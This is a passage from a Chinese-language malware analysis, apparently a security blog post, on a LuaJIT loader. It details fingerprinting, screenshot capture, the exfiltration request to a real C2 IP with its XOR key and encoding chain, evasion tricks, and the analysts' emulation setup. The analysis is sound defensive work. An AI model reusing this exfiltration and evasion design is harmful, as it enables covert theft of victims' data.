14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">InMemoryOrderModuleList</span></code><span leaf=""> 链表，手动定位 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">kernel32.dll</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ntdll.dll</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wininet.dll</span></code><span leaf=""> 的导出表，绕过 IAT Hook。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="129" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">系统指纹采集</span></strong><span leaf="">：</span></p></li><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">RegQueryValueExW(HKLM\...\Cryptography, MachineGuid)</span></code><span leaf=""> — 获取机器唯一标识</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetComputerNameW</span></code><span leaf=""> — 获取计算机名</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VerifyVersionInfoW</span></code><span leaf=""> — 获取 Windows 版本</span></p></li></ul><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="134" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">地理位置探测</span></strong><span leaf="">：</span></p></li><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">InternetOpenW(agent=&#34;&#34;)</span></code><span leaf=""> — UA 为空字符串（规避流量检测）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">InternetConnectW(&#34;ip-api.com&#34;, 80)</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GET /json/</span></code><span leaf=""> → </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load(response)</span></code><span leaf=""> — 获取公网 IP / 国家 / 城市 / 时区</span></p></li></ul><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="139" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">桌面截图采集</span></strong><span leaf="">：</span></p></li><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetDC</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateCompatibleDC</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateDIBSection</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">BitBlt</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">截取桌面截图（1920×1080，24-bit BMP，约 6.2MB）</span></p></li></ul></ol><figure data-line="143" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img alt="ptd.txt 执行流程图" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027781" data-ratio="0.5583333333333333" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=01732209&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwU67QnqHvYoibJacA1PNKjia6iamupdibHvKMk7KPtK04UEk6m7zlibMK8a9fYTfezs64I4dNE39VnHDvlJh5TCJk5PibED1vT4PicfAY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">ptd.txt 执行流程图</span></figcaption></figure><p data-line="146" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">地理位置探测</span></strong><span leaf="">是这一阶段的关键细节。样本通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ip-api.com/json/</span></code><span leaf=""> 获取受害者的公网 IP、国家代码、城市与时区。</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 阶段的 HTTP 会话 User-Agent 为</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">空字符串</span></strong><span leaf="">（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">agent=&#34;&#34;</span></code><span leaf="">）。这是一个刻意的设计：空 UA 在流量层面极难被基于特征的 IDS 规则命中，而在后续热补丁阶段，UA 将切换为伪造的 Chrome 142 字符串，以混入正常浏览器流量。</span></p><h4 data-line="148" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">1.3 C2 上传协议：bot_info 三层加密与热补丁获取</span></h4><p data-line="150" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">完成侦察后，样本将截图与受害者信息打包上传至初始 C2（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">213.176.73.162</span></code><span leaf="">）。上传协议采用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">multipart/form-data</span></code><span leaf=""> 格式，boundary 硬编码为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">9kx2ojcammt6iwx9bs40a5xp4am0oo69pr</span></code><span leaf="">：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">POST /api/NTE3YjdjNWU1NjYzNjU2YTA1N2Y= HTTP/1.1</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Host: 213.176.73.162</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Content-Type: multipart/form-data; boundary=9kx2ojcammt6iwx9bs40a5xp4am0oo69pr</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">--9kx2ojcammt6iwx9bs40a5xp4am0oo69pr</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Content-Disposition: form-data; name=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;file&#34;</span></span><span leaf="">; filename=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&lt;110字符随机串&gt;&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Content-Type: application/octet-stream</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">[BMP 截图数据，约 6,220,854 字节]</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">--9kx2ojcammt6iwx9bs40a5xp4am0oo69pr</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Content-Disposition: form-data; name=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;data&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Content-Type: application/json</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">{</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;data&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&lt;base64(hex(XOR(bot_info, key)))&gt;&#34;</span></span><span leaf="">}</span></p></code></pre></p><p data-line="168" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">其中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">bot_info</span></code><span leaf=""> 字段经过三层编码处理后嵌入请求体：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">bot_info 明文（</span><span style="color: rgb(76, 129, 201);"><span leaf="">URL</span></span><span leaf="">-encoded）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  └─ </span><span style="color: rgb(76, 129, 201);"><span leaf="">XOR</span></span><span leaf=""> 加密（密钥：</span><span style="color: rgb(0, 72, 171);"><span leaf="">ECe6VGLRJum</span></span><span leaf="">2qYtl79OiOU7aHot7Zhbn，循环使用）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">       └─ </span><span style="color: rgb(0, 72, 171);"><span leaf="">Hex</span></span><span leaf=""> 编码（小写十六进制字符串）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            └─ </span><span style="color: rgb(0, 72, 171);"><span leaf="">Base64</span></span><span leaf=""> 编码</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                 └─ 嵌入 </span><span style="color: rgb(0, 72, 171);"><span leaf="">JSON</span></span><span leaf="">：{</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;data&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&lt;result&gt;&#34;</span></span><span leaf="">}</span></p></code></pre></p><p data-line="178" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">bot_info</span></code><span leaf=""> 的明文内容为：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">loaderId=839&amp;guid={MachineGuid}&amp;computer={name}&amp;query={IP}&amp;country={CC}&amp;city={city}&amp;timezone={tz}&amp;os={ver} x64</span></code><span leaf="">。其中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">loaderId=839</span></code><span leaf=""> 是硬编码的 MaaS（恶意软件即服务）联盟 ID，标识了这批样本所属的攻击者分支。</span></p><p data-line="180" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2 响应即代码</span></strong><span leaf="">：这是整个攻击链最精妙的设计之一。C2 对截图上传请求的响应并非普通的控制指令，而是</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">可直接执行的 Lua 代码</span></strong><span leaf="">。</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 在调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load()</span></code><span leaf=""> 前会在响应内容前拼接 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">&#34;return &#34;</span></code><span leaf=""> 前缀（实测：297,111 + 7 = 297,118 字节），使热补丁的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">return(function(...)...)</span></code><span leaf=""> 结构成为合法的 Lua 表达式并立即执行。这意味着攻击者可以随时通过修改 C2 响应来更新恶意逻辑，而无需重新感染受害者。</span></p><p data-line="182" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">上述运行时行为的完整还原，依赖于我们在 Linux 环境中搭建的动态仿真层——这也是本次分析最核心的技术挑战。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="186" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">阶段二：Lua沙箱突围——三层仿真架构详解</span></h3><p data-line="188" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">要理解阶段一中描述的那些运行时细节——PEB 遍历的每一步、截图的精确规格、bot_info 的加密链——首先需要回答一个前置问题：我们是如何让这个样本在受控环境中完整执行的？</span></p><h4 data-line="190" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">静态分析的极限</span></h4><p data-line="192" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 的混淆设计从根本上封堵了静态还原的可能性。114KB 的加密常量池（P Table）并非一个可以被整体解密的数据块，而是被数以百计的自定义函数以不同的索引偏移和加减运算分散引用。每一个 API 名称、每一段逻辑片段，都在运行时由多个函数协作拼接而成。这意味着静态分析工具面对的不是一段可以被反编译的代码，而是一张只有在运行时才能被激活的执行图谱。强行静态还原不仅成本极高，更容易因遗漏某条解密分支而得到残缺的结果。唯一可行的路径，是让样本在受控环境中真实执行，在执行过程中直接拦截其行为。</span></p><h4 data-line="194" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">为什么选择 LuaJIT 运行时定制</span></h4><p data-line="196" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">常规的动态分析路径（Cuckoo 沙箱、WinDbg 附加调试）对这个样本同样适用——样本最终会在 Windows 环境中执行，API 调用可以被系统级工具捕获。但这类方案存在固有局限：Cuckoo 的 IAT Hook 在样本绕过 IAT 后会产生盲区；WinDbg 需要在真实 Windows 环境中操作，分析过程难以自动化，且每次调整都需要重新运行完整的感染链。</span></p><p data-line="198" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">我们选择了一条更具针对性的路径：直接在 LuaJIT 运行时内部构建定制化的动态分析环境。这一选择的核心优势在于：样本的所有恶意逻辑都运行在 LuaJIT 的 Lua 层，这意味着我们可以在不触碰任何 Windows 内核机制的前提下，以 Lua 函数为粒度对任意调用实施 Hook——</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cast</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cdef</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">string.format</span></code><span leaf=""> 均可被无缝劫持，拦截精度远超系统级工具。</span></p><p data-line="200" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这一方案的前提是运行时版本必须与恶意软件完全一致。</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 的恶意逻辑通过 LuaJIT 的 FFI 模块直接操作 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cdata</span></code><span leaf=""> 结构体，LuaJIT 2.1 的 FFI 实现与标准 Lua 5.x 存在根本性的类型系统差异——</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cdata</span></code><span leaf=""> 对象的内存布局、指针语义和类型转换规则均不兼容。因此我们编译了与恶意软件完全相同版本的 LuaJIT 2.1.0-beta3，在此基础上植入探针，构建了一套在 Linux 上完整复现 Windows 执行环境的仿真层。</span></p><h4 data-line="202" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">整体动态分析思路：三层仿真</span></h4><p data-line="204" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在 Linux 环境中运行这个样本，面临的核心矛盾是：样本的所有行为都依赖于 Windows 特有的内存结构和系统 API，而这些在 Linux 上根本不存在。我们的解决方案是构建一套</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">对样本完全透明的三层仿真架构</span></strong><span leaf="">，使其&#34;以为&#34;自己运行在真实的 Windows 环境中：</span></p><p data-line="206" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">三层仿真架构</span></strong><span leaf="">：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="208" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第一层：假 PEB 结构体（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fake_peb</span></code><span leaf="">）</span></strong><span leaf=""> 拦截 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GS:[0x60]</span></code><span leaf=""> 读取，返回我们构造的假进程环境块。欺骗目标：样本的 DLL 遍历逻辑。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="211" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第二层：假 PE 内存映像（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fake_winapi.so</span></code><span leaf="">）</span></strong><span leaf=""> 在 64KB 可执行内存中伪造 DOS/NT 头 + 44 项导出表。欺骗目标：样本的 PE 解析器与 API 地址解析。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="214" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第三层：WinINET API 代理（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fake_winapi.c</span></code><span leaf="">）</span></strong><span leaf=""> 用 C 实现 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">InternetOpenW</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">HttpSendRequestW</span></code><span leaf=""> 等完整代理。欺骗目标：样本的网络请求，并注入预解密的 C2 响应。</span></p></li></ul><figure data-line="217" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img alt="三层仿真架构示意图" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027786" data-ratio="0.5583333333333333" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9473fe81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVxicxLhiakp2uWBiaIzYcbcxFaI1bQDWupPicohZTjcbhE3uMGzgnA5v1ia8jjP24PibIolvJZCqXVzor9pIH2icIiaBQjLdYU0OWgjtQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">三层仿真架构示意图</span></figcaption></figure><p data-line="220" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">三层组件相互依赖，缺一不可：没有假 PEB，样本找不到任何 DLL；没有假 PE 映像，样本的导出表解析会崩溃；没有 WinINET 代理，样本无法完成 C2 通信，热补丁永远无法被触发。以下各节按照&#34;障碍暴露 → 仿真应对&#34;的顺序逐层展开。</span></p><h4 data-line="222" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">2.1 恶意行为：</span><code style="font-size: 15.84px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GS:[0x60]</span></code><span leaf=""> PEB 劫持与 IAT 绕过</span></h4><p data-line="224" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">仿真层搭建面临的第一个核心障碍，来自样本对 Windows 内存结构的直接操作。样本展现出极高的环境感知能力以规避常规动态监控（如 API Monitor）。它摒弃了标准的 IAT 导入表解析，转而在内存中直接定位系统 DLL。</span></p><p data-line="226" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">底层寻址机制</span></strong><span leaf="">：脚本通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cdef</span></code><span leaf=""> 声明了长达 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">8,514 字节</span></strong><span leaf="">的 C 语言结构体，涵盖 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VirtualAlloc</span></code><span leaf="">、</span><code 